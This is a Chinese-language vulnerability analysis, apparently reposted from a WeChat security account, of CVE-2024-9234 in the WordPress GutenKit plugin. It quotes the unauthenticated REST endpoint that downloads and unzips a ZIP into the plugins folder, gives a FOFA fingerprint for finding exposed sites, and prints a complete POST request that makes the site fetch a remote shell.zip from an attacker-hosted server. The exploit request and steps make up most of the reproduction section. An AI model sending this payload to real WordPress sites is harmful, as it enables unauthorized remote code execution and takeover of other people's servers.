0x00 前言
CVE-2024-9234,看到网上没有相关文章或EXP,遂分析一下.
GutenKit 是一个WordPress的页面构建器,在 Gutenberg 设计您的下一个 WordPress 网站。借助 Gutenberg 的原生拖放界面、50+ WordPress 块、14+ 多功能模块和 500+ 模板,您可以在几分钟内创建专业、响应迅速的 Web 内容,这个漏洞是一个标准的远程文件写入漏洞. 插件下载量: 9000+
影响范围 <=2.1.0
Fofa指纹:"wp-content/plugins/gutenkit-blocks-addon"
首先下载安装WordPress 插件GutenKit 2.1.0 然后启用插件
Wordpress Test Version:5.6.1
0x01 漏洞分析
位于/wp-content/plugins/gutenkit-blocks-addon/includes/Admin/Api/ActivePluginData.php 控制器中的 install_and_activate_plugin_from_external 方法存在很明显的文件下载操作,通过Download_file方法下载ZIP文件,并且直接将其解压到 /wp-content/plugins/ 目录中.
public function install_and_activate_plugin_from_external($request) {
// The external plugin URL
$plugin_url = $request->get_param('plugin');
$slug = $request->get_param('slug');
$plugin_slug = "$slug/$slug.php";
$plugin_dir = WP_PLUGIN_DIR; // This points to wp-content/plugins
require_once ABSPATH . 'wp-admin/includes/file.php';
require_once ABSPATH . 'wp-admin/includes/plugin.php';
require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
WP_Filesystem();
// Download the plugin ZIP file
$temp_file = download_url($plugin_url);
if (is_wp_error($temp_file)) {
wp_send_json_error('Failed to download plugin. Error: ' . $temp_file->get_error_message());
return;
}
$command = "unzip $temp_file -d $plugin_dir";
exec($command);
// Unzip the plugin into the wp-content/plugins directory
$unzip_result = unzip_file($temp_file, $plugin_dir);
// Delete the temporary file after unzipping
unlink($temp_file);
if (is_wp_error($unzip_result)) {
wp_send_json_error('Failed to unzip plugin. Error: ' . $unzip_result->get_error_message());
return;
}
// Check if the plugin directory exists
$plugin_path = $plugin_dir . '/' . $plugin_slug;
if (!file_exists($plugin_path)) {
wp_send_json_error('The plugin directory does not exist after unzipping.');
return;
} else {
wp_send_json_success('Plugin installed successfully!');
}
}
追踪一下入口函数 : 同样在此控制器文件中注册了Rest Api端点及操作.
public function __construct() {
add_action('rest_api_init', function() {
register_rest_route('gutenkit/v1', 'active-plugin',
array(
'methods' => WP_REST_Server::READABLE,
'callback' => [$this, 'action_get_active_plugin'],
'permission_callback' => '__return_true',
),
);
});
add_action('rest_api_init', function() {
register_rest_route('gutenkit/v1', 'install-active-plugin',
array(
'methods' => WP_REST_Server::EDITABLE,
'callback' => [$this, 'install_and_activate_plugin_from_external'],
'permission_callback' => '__return_true',
),
);
});
}
所以只需要请求 /wp-json/gutenkit/v1/install-active-plugin 即可进行写入
0x02 漏洞复现
首先需要准备一个php文件,里边写上<?php phpinfo();?>,然后压缩一下ZIP,之后上传在云服务器或者VPS里(不推荐用https协议).
Payload:
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
Host: 127.0.0.1
Origin: http://127.0.0.1
Pragma: no-cache
Referer: http://127.0.0.1/wp-json/gutenkit/v1/install-active-plugin
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
sec-fetch-user: ?1
plugin=http://xxx.xxx/shell.zip
当出现 The plugin directory does not exist after unzipping. 的错误时,其实已经成功了,zip已经被解压到了 /wp-content/plugins/ 中,直接访问即可.
0x03 插件下载
标签:代码审计,0day,渗透测试,系统,通用,0day,闲鱼,转转
GutenKit 源码关注公众号发送 241016 获取!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!!
原文始发于微信公众号(星悦安全):Wordpress GutenKit 插件远程文件写入漏洞分析(RCE)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论